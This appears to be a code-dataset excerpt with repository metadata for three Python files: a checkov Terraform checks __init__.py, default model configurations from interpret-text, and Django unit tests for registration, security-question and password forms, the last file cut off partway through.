2d8e5b7fcc40e28403a0e1aeeb3377d9a14e55fe
| 158
|
py
|
Python
|
checkov/terraform/checks/resource/__init__.py
|
cclauss/checkov
|
60a385fcaff1499cf00c2d0018575fe5ab71f556
|
[
"Apache-2.0"
] | 1
|
2021-01-26T12:46:32.000Z
|
2021-01-26T12:46:32.000Z
|
checkov/terraform/checks/resource/__init__.py
|
cclauss/checkov
|
60a385fcaff1499cf00c2d0018575fe5ab71f556
|
[
"Apache-2.0"
] | 1
|
2021-06-02T03:40:50.000Z
|
2021-06-02T03:40:50.000Z
|
checkov/terraform/checks/resource/__init__.py
|
cclauss/checkov
|
60a385fcaff1499cf00c2d0018575fe5ab71f556
|
[
"Apache-2.0"
] | 1
|
2021-11-28T09:51:01.000Z
|
2021-11-28T09:51:01.000Z
|
from checkov.terraform.checks.resource.aws import *
from checkov.terraform.checks.resource.gcp import *
from checkov.terraform.checks.resource.azure import *
| 39.5
| 53
| 0.829114
| 21
| 158
| 6.238095
| 0.428571
| 0.251908
| 0.458015
| 0.59542
| 0.870229
| 0.610687
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075949
| 158
| 3
| 54
| 52.666667
| 0.89726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
2de7d07ad1ece8929472df554fd9223f67ebed89
| 1,975
|
py
|
Python
|
python/interpret_text/experimental/common/model_config/model_config_constants.py
|
imatiach-msft/interpret-text
|
7629b78f425459a84a40fe0acf370de5b5b27bd1
|
[
"MIT"
] | 277
|
2020-05-12T10:14:02.000Z
|
2022-03-31T07:09:06.000Z
|
python/interpret_text/experimental/common/model_config/model_config_constants.py
|
nehalecky/interpret-text
|
62a5e7406bf5c7d2df69648a278082d602e88dd6
|
[
"MIT"
] | 49
|
2020-04-30T18:15:30.000Z
|
2022-02-27T01:03:04.000Z
|
python/interpret_text/experimental/common/model_config/model_config_constants.py
|
nehalecky/interpret-text
|
62a5e7406bf5c7d2df69648a278082d602e88dd6
|
[
"MIT"
] | 48
|
2020-05-08T16:07:32.000Z
|
2022-03-06T21:34:18.000Z
|
from typing import Dict
""" Default model configuration used by BERT, RNN and BERT_RNN """
def get_bert_default_config() -> Dict:
return{
"cuda": False,
"pretrain_cls": False,
"batch_size": 32,
"num_epochs": 1,
"num_pretrain_epochs": 10,
"save_best_model": False,
"hidden_dim": 768,
"embedding_dimension": 768,
"gen_embedding_dim": 768,
"label_embedding_dim": 400,
"fixed_classifier": False,
"lambda_sparsity": 1.0,
"lambda_continuity": 0,
"lambda_anti": 1.0,
"target_sparsity": 0.3,
"training_stop_thresh": 5,
"count_pieces": 4,
"fine_tuning": True,
"bert_explainers": True,
"dropout_rate": 0.3,
"layer_num": 1,
"embedding_dim": 100,
"exploration_rate": 0.05,
"lambda_acc_gap": 1.2,
"lr": 2e-4,
"train_batch_size": 32,
"test_batch_size": 32
}
def get_rnn_default_config() -> Dict:
return{
"cuda": False,
"pretrain_cls": False,
"batch_size": 32,
"num_epochs": 1,
"num_pretrain_epochs": 10,
"save_best_model": False,
"hidden_dim": 100,
"embedding_dimension": 100,
"gen_embedding_dim": 100,
"label_embedding_dim": 400,
"fixed_classifier": False,
"lambda_sparsity": 1.0,
"lambda_continuity": 0,
"lambda_anti": 1.0,
"target_sparsity": 0.3,
"training_stop_thresh": 5,
"count_pieces": 4,
"fine_tuning": True,
"bert_explainers": False,
"dropout_rate": 0.3,
"layer_num": 1,
"embedding_dim": 100,
"exploration_rate": 0.05,
"lambda_acc_gap": 1.2,
"lr": 2e-4,
"train_batch_size": 32,
"test_batch_size": 32
}
def get_bert_rnn_default_config() -> Dict:
return{
"hidden_dim": 100,
"embedding_dimension": 768
}
| 26.333333
| 66
| 0.550886
| 230
| 1,975
| 4.386957
| 0.304348
| 0.053518
| 0.065411
| 0.068385
| 0.8444
| 0.765114
| 0.765114
| 0.765114
| 0.765114
| 0.765114
| 0
| 0.068098
| 0.315949
| 1,975
| 74
| 67
| 26.689189
| 0.678756
| 0
| 0
| 0.772727
| 0
| 0
| 0.396543
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| true
| 0
| 0.015152
| 0.045455
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9344cae25ee00a2c12d588eef78ebf6caf547cf0
| 44,468
|
py
|
Python
|
authentication_service/tests/test_forms.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2018-03-15T12:49:05.000Z
|
2018-03-15T12:49:05.000Z
|
authentication_service/tests/test_forms.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 215
|
2017-12-07T09:11:52.000Z
|
2022-03-11T23:19:59.000Z
|
authentication_service/tests/test_forms.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T12:05:32.000Z
|
2021-08-17T12:05:32.000Z
|
from dateutil.relativedelta import relativedelta
import datetime
from unittest import mock
from django.contrib.auth import get_user_model
from django.forms import model_to_dict
from django.test import TestCase, override_settings
from authentication_service.forms import (
RegistrationForm, SecurityQuestionFormSet,
EditProfileForm, SetPasswordForm, PasswordChangeForm
)
from authentication_service import constants
from authentication_service.models import SecurityQuestion, Organisation
from authentication_service.user_migration.forms import (
UserDataForm
)
@override_settings(
HIDE_FIELDS={"global_enable": False,
"global_fields": ["email", "msisdn", "birth_date"]}
)
class TestRegistrationForm(TestCase):
maxDiff = None
def test_default_state(self):
form = RegistrationForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_default_password_validation(self):
# Test both required
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"password1": "password",
"terms": True,
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["This field is required."],
})
# Test both must match
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "password",
"password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["The two password fields don't match. Please try again."],
})
# Test min length
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "123",
"password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["Password not long enough."],
})
# Test passwords happy
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "1234",
"password2": "1234"
})
self.assertTrue(form.is_valid())
form.clean() # We need to clean the form to ensure birth_date is set appropriately
def test_default_email_msisdn(self):
# Test either is required
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"__all__": ["Enter either email or msisdn"]
})
# Test valid with email
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
# Test valid with msisdn
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
# Test valid with both
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
def test_default_required_toggle(self):
required = [
"username", "first_name", "last_name", "email",
"nickname", "msisdn", "gender", "birth_date", "country", "avatar"
]
form = RegistrationForm(data={}, required=required)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"first_name": ["This field is required."],
"last_name": ["This field is required."],
"email": ["This field is required."],
"nickname": ["This field is required."],
"msisdn": ["This field is required."],
"gender": ["This field is required."],
"country": ["This field is required."],
"avatar": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_default_required_toggle_mapping(self):
required = [
"names", "picture"
]
form = RegistrationForm(data={}, required=required)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"first_name": ["This field is required."],
"last_name": ["This field is required."],
"nickname": ["This field is required."],
"avatar": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_high_security_default_state(self):
form = RegistrationForm(data={}, security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"email": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_high_security_password_validation(self):
# Test both required
form = RegistrationForm(data={
"username": "Username",
"birth_date": datetime.date(2000, 1, 1),
"email": "email@email.com",
"password1": "password",
"terms": True,
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["This field is required."],
})
# Test both must match
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "password",
"password2": "password2"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["The two password fields don't match. Please try again."],
})
# Test min length, unique validation and contains more than numeric
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2001, 1, 1),
"terms": True,
"password1": "123",
"password2": "123"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": [
"This password is too short. It must contain at least 8 characters.",
"This password is entirely numeric.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test unique validation
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "asdasdasd",
"password2": "asdasdasd"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": [
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test close to username
form = RegistrationForm(data={
"username": "asdasd",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "asdasdasd",
"password2": "asdasdasd"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": [
"The password is too similar to the username.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test success
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2001, 1, 1),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
},
security="high")
self.assertTrue(form.is_valid())
def test_age_to_birth_date(self):
# Test age specified instead of birth_date. Refer to the link below for an explanation of
# why the mocking is done the way it is:
# http://www.voidspace.org.uk/python/mock/examples.html#partial-mocking
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2000, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = RegistrationForm(
data={
"username": "Username",
"email": "email@email.com",
"age": "16",
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
},
security="high"
)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data["birth_date"], datetime.date(1984, 1, 2))
def test_high_security_required_toggle(self):
required = [
"username", "first_name", "last_name", "email",
"nickname", "msisdn", "gender", "birth_date", "country", "avatar"
]
form = RegistrationForm(data={}, security="high", required=required)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"first_name": ["This field is required."],
"last_name": ["This field is required."],
"email": ["This field is required."],
"nickname": ["This field is required."],
"msisdn": ["This field is required."],
"gender": ["This field is required."],
"country": ["This field is required."],
"avatar": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_email_validation(self):
user = get_user_model().objects.create_user(
username="awesomeuser",
email="awesome@email.com",
password="Awesome!234",
birth_date=datetime.date(2001, 1, 1)
)
user.save()
form = RegistrationForm(data={
"username": "Username",
"email": "awesome@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "password",
"password2": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"email": ["Core user with this Email address already exists."],
})
# Test users without emails do not cause validation errors.
user = get_user_model().objects.create_user(
username="awesomeuser2",
password="Awesome!234",
birth_date=datetime.date(2001, 1, 1)
)
user.save()
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
form = RegistrationForm(data={
"username": "Username2",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
def test_min_required_age_dob(self):
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date.today() - relativedelta(years=10),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
def test_min_required_age(self):
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"age": constants.CONSENT_AGE-1,
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"age": [
"We are sorry, " \
f"users under the age of {constants.CONSENT_AGE}" \
" cannot create an account."
]
})
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 3),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2018-constants.CONSENT_AGE+1, 1, 3),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
def test_on_required_age(self):
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"age": constants.CONSENT_AGE,
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 2),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
def test_unique_username(self):
user = get_user_model().objects.create_user(
username="testuser",
birth_date=datetime.date(2000, 1, 1),
email="wrong@email.com",
gender="female",
email_verified=True
)
form = RegistrationForm(data={
"username": user.username,
"email": "email@email.com",
"age": constants.CONSENT_AGE,
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": [
"Oh no! Looks like somebody else already took your username. "
"Please try something else, you get to choose an even cooler one this time!"
],
})
class TestRegistrationFormHTML(TestCase):
maxDiff = None
def test_default_state(self):
form = RegistrationForm(data={})
self.assertFalse(form.is_valid())
# TODO Update once end user has new copy
self.assertNotIn("<li>Your password can't be too similar to your " \
"other personal information.</li><li>Your password must contain at " \
"least 8 characters.</li><li>Your password can't be a commonly " \
"used password.</li><li>Your password can't be entirely numeric." \
"</li><li>The password must contain at least one uppercase letter, " \
"one lowercase one, a digit and special character.</li>", form.as_div())
def test_high_security_state(self):
form = RegistrationForm(data={}, security="high")
self.assertFalse(form.is_valid())
self.assertIn("<li>Your password can't be too similar to your " \
"other personal information.</li><li>Your password must contain at " \
"least 8 characters.</li><li>Your password can't be a commonly " \
"used password.</li><li>Your password can't be entirely numeric." \
"</li><li>The password must contain at least one uppercase letter, " \
"one lowercase one, a digit and special character.</li>", form.as_div())
class TestRegistrationFormWithHideSetting(TestCase):
maxDiff = None
def test_default_state(self):
form = RegistrationForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"gender": ["This field is required."],
"age": ["This field is required."],
"terms": ["This field is required."],
})
def test_default_settings(self):
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"gender": "none",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
# Test valid with email
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
# Test valid with msisdn
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
# Test valid with both
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"msisdn": "0856545698",
"birth_date": datetime.date(2000, 1, 1),
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
class TestSecurityQuestionFormSet(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
super(TestSecurityQuestionFormSet, cls).setUpTestData()
# Security questions
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
def test_default_state(self):
data = {
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
def test_validation(self):
# Ensure that all questions need to be answered when email is not
# present.
data = {
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(
formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
# Ensure its valid if email is present
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertTrue(formset.is_valid())
# Ensure that all questions need to be answered. If anything was filled
# in on the questions.
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": self.question_two.id,
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
# Test answer validation
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "",
"form-1-question": self.question_two.id,
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(
formset.errors, [
{"answer": ["Don’t forget to answer your question!"]},
{"answer": ["Don’t forget to answer your question!"]}
]
)
# Test same questions can't be selected more than once.
data = {
"email": "",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "Answer1",
"form-1-question": self.question_one.id,
"form-1-answer": "Answer2"
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(
formset.non_form_errors(),
["Oops! You’ve already chosen this question. Please choose a different one."]
)
# Test valid with email.
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "Answer1",
"form-1-question": self.question_two.id,
"form-1-answer": "Answer2"
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertTrue(formset.is_valid())
# Test valid without email.
data = {
"email": "",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "Answer1",
"form-1-question": self.question_two.id,
"form-1-answer": "Answer2"
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertTrue(formset.is_valid())
class EditProfileFormTestCase(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username="testuser",
birth_date=datetime.date(2000, 1, 1),
email="wrong@email.com",
gender="female",
email_verified=True
)
cls.user.save()
def test_default_state(self):
form = EditProfileForm(instance=self.user)
initial_dict = {
"email": "wrong@email.com"
}
# Check initial values
self.assertTrue(
set(initial_dict.items()).issubset(set(form.initial.items())))
def test_update_profile(self):
data = {
"email": "right@email.com",
"msisdn": "+27821234567",
"age": 34,
"gender": "female"
}
form = EditProfileForm(instance=self.user, data=data)
self.assertTrue(form.has_changed())
self.assertTrue(form.is_valid())
form.save()
user = get_user_model().objects.get(username=self.user.username)
self.assertNotEqual(datetime.date(2000, 1, 1), user.birth_date)
self.assertEqual(data["email"], user.email)
self.assertEqual(data["msisdn"], user.msisdn)
def test_nothing_updated(self):
data = model_to_dict(self.user)
form = EditProfileForm(instance=self.user, data=data)
self.assertFalse(form.has_changed())
self.assertTrue(form.is_valid())
def test_invalid_form(self):
data = {
"email": "not_an_email",
"gender": "no",
"country": "abc"
}
form = EditProfileForm(instance=self.user, data=data)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors, {
"email":
["Enter a valid email address."],
"gender":
["Select a valid choice. no is not one of the available "
"choices."],
"country":
["Select a valid choice. That choice is not one of the "
"available choices."],
}
)
def test_min_required_age_dob(self):
form = EditProfileForm(data={
"birth_date": datetime.date.today() - relativedelta(years=10),
})
self.assertFalse(form.is_valid())
@override_settings(
HIDE_FIELDS={"global_enable": False,
"global_fields": ["birth_date"]}
)
def test_age_and_dob_required(self):
form = EditProfileForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"__all__": [
"Enter either birth date or age"
],
"gender": ["This field is required."],
})
def test_min_required_age(self):
form = EditProfileForm(data={
"age": constants.CONSENT_AGE-1,
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"gender": ["This field is required."],
"age": [
"We are sorry, " \
f"users under the age of {constants.CONSENT_AGE}" \
" cannot create an account."
]
})
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = EditProfileForm(data={
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 3),
})
self.assertFalse(form.is_valid())
form = EditProfileForm(data={
"birth_date": datetime.date(2018-constants.CONSENT_AGE+1, 1, 3),
})
self.assertFalse(form.is_valid())
def test_on_required_age(self):
form = EditProfileForm(data={
"age": constants.CONSENT_AGE,
"gender": "female"
})
self.assertTrue(form.is_valid())
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = EditProfileForm(data={
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 2),
"gender": "female"
})
self.assertTrue(form.is_valid())
class TestPasswordResetForm(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username="forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="atleastihavethis@email.com",
email_verified=True
)
cls.user.save()
org = Organisation.objects.create(
name="uniquename",
description="some text"
)
cls.org_user = get_user_model().objects.create_user(
username="org_forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="org_atleastihavethis@email.com",
email_verified=True,
organisation=org
)
cls.org_user.save()
def test_none_org_html_state(self):
form = SetPasswordForm(self.user)
html = form.as_div()
self.assertNotIn(
"The password must contain at least one uppercase letter, one lowercase one, a digit and special character",
html
)
def test_org_html_state(self):
form = SetPasswordForm(self.org_user)
html = form.as_div()
self.assertIn(
"The password must contain at least one uppercase letter, one lowercase one, a digit and special character",
html
)
def test_user_password_validation(self):
# Test both required
form = SetPasswordForm(self.user, data={
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = SetPasswordForm(self.user, data={
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length
form = SetPasswordForm(self.user, data={
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"Eeek - that password is too short! "
"Please create a password that has at least 8 characters and is a combination of letters and numbers."
]
})
def test_org_user_password_validation(self):
# Test both required
form = SetPasswordForm(self.org_user, data={
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = SetPasswordForm(self.org_user, data={
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length, unique validation and contains more than numeric
form = SetPasswordForm(self.org_user, data={
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"This password is too short. It must contain at least 8 characters.",
"This password is entirely numeric.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test unique validation
form = SetPasswordForm(self.org_user, data={
"new_password1": "asdasdasd",
"new_password2": "asdasdasd"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test close to username
form = SetPasswordForm(self.org_user, data={
"new_password1": "forgotmypass",
"new_password2": "forgotmypass"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password is too similar to the username.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test success
form = SetPasswordForm(self.org_user, data={
"new_password1": "asdasdasdA@1",
"new_password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
class TestPasswordChangeForm(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username="forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="atleastihavethis@email.com",
email_verified=True
)
cls.user.set_password("atleast_its_not_1234")
cls.user.save()
org = Organisation.objects.create(
name="uniquename",
description="some text"
)
cls.org_user = get_user_model().objects.create_user(
username="org_forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="org_atleastihavethis@email.com",
email_verified=True,
organisation=org
)
cls.org_user.set_password("atleast_its_not_1234")
cls.org_user.save()
def test_none_org_html_state(self):
form = PasswordChangeForm(self.user)
